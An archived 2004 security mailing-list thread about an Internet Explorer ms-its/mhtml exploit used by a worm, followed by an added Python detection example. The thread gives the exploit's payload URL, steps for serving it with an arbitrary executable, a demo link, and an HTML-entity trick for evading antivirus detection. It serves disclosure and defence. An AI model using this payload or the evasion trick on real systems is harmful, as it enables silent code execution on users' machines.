Re: new internet explorer exploit (was new worm)

From: Jelmer (jkuperus_at_planet.nl)
Date: 03/30/04

    Date: Tue, 30 Mar 2004 13:00:29 +0200
    To: Void <void@sect.net>, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
    
    

    And even that small measure of warning is trivially defeated

    if I change the url in my exploit.htm from

    ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

    to

    &#109;s-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

    It gives no warning whatsoever, proving once again that you shouldn't
    solely rely on virus scanners. Though others might do a better job, I can't
    imagine anyone doing it worse.

    ----- Original Message -----
    From: "Void" <void@sect.net>
    To: "Jelmer" <jkuperus@planet.nl>; <full-disclosure@lists.netsys.com>;
    <bugtraq@securityfocus.com>
    Sent: Monday, March 29, 2004 9:15 PM
    Subject: Re: new internet explorer exploit (was new worm)

    > Just wanted to add that Norton Anti-Virus 2004 will detect this exploit and
    > pop up a warning, but also fails to halt its execution or protect the user
    > in any way.
    >
    > Here is what it thinks it is:
    >
    > http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html
    >
    > So there is some measure of warning, but no real protection.
    >
    >
    > At 04:35 PM 3/29/2004 +0200, Jelmer wrote:
    > >The code used by this worm to exploit its users is at least partly (I
    > >think) new; the vulnerability it abused has afaik not been published on
    > >either bugtraq or full-disclosure, possibly making it (one of?) the first
    > >worm to totally catch people off guard.
    > >
    > >It allows a malicious person to take any action on the PC of an unsuspecting
    > >user who views a specially prepared page
    > >
    > >The known ingredient it uses is:
    > >http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2003-08/1758.html
    > >that has gone unpatched for over 5 months now
    > >
    > >The remainder of the exploit manages to confuse this same adodb.stream
    > >object enough to make it think it's being run from a local location
    > >
    > >You can protect yourself against it by running
    > >http://ip3e83566f.speed.planet.nl/hacked-by-chinese/fix.reg
    > >
    > >
    > >I attached sample code myself to illustrate the problem, because
    > >http-equiv's was messy :)
    > >This one should be more straightforward to use
    > >
    > >Instructions:
    > >
    > >1. unzip
    > >2. overwrite exploit.exe with the executable you wish to run, or leave it
    > >untouched if you want to see some nice texturemapped rotation
    > >3. upload the files to a webserver
    > >4. view exploit.htm
    > >
    > >Tested on winxp pro all patches
    > >
    > >The lazy ones among you can also view a demonstration here:
    > >
    > >http://ip3e83566f.speed.planet.nl/security/newone/exploit.htm
    >
    >
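The signature-evasion trick Jelmer describes above (the literal `ms-its:` scheme matched by the scanner, the `&#109;s-its:` form not) as an added detection example, not code from the thread: a literal signature is compared against the same signature applied after decoding HTML character references. The sample documents, host and file names are constructed placeholders.

```python
import html
import re

# Constructed test documents modelled on the two URL forms quoted in the
# thread; host and file names are placeholders, not the original exploit files.
PLAIN = '<iframe src="ms-its:mhtml:file://C:\\foo.mht!http://host.invalid/X.CHM::/x.htm">'
ENTITY = '<iframe src="&#109;s-its:mhtml:file://C:\\foo.mht!http://host.invalid/X.CHM::/x.htm">'
HEX_ENTITY = '<iframe src="&#x6D;S-ITS:mhtml:file://C:\\foo.mht!http://host.invalid/X.CHM::/x.htm">'
BENIGN = '<a href="http://host.invalid/page.htm">notes on the ms-its: handler</a>'

# The scheme chain the thread discusses: ms-its: wrapping an mhtml: URL.
SCHEME_RE = re.compile(r"ms-its:mhtml:", re.IGNORECASE)
# Attribute values that can carry a URL (sufficient for this demonstration).
ATTR_RE = re.compile(r'\b(?:src|href)\s*=\s*["\']([^"\']*)["\']', re.IGNORECASE)


def naive_match(doc):
    """Literal signature on the raw bytes: the behaviour the thread describes,
    which the entity-encoded form slips past."""
    return SCHEME_RE.search(doc) is not None


def normalize(value, max_rounds=5):
    """Decode HTML character references until the text stops changing, so
    &#109;, &#x6D; and double-encoded forms like &amp;#109; all become 'm'."""
    for _ in range(max_rounds):
        decoded = html.unescape(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_refs(doc):
    """Return the decoded src/href values that use the ms-its:mhtml: chain."""
    return [normalize(raw) for raw in ATTR_RE.findall(doc)
            if SCHEME_RE.search(normalize(raw))]


def normalized_match(doc):
    """Signature applied after decoding: catches all three encodings."""
    return bool(suspicious_refs(doc))


if __name__ == "__main__":
    samples = [("plain", PLAIN), ("entity", ENTITY), ("hex", HEX_ENTITY), ("benign", BENIGN)]
    for name, doc in samples:
        print(f"{name:7} naive={naive_match(doc)!s:5} normalized={normalized_match(doc)}")
```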

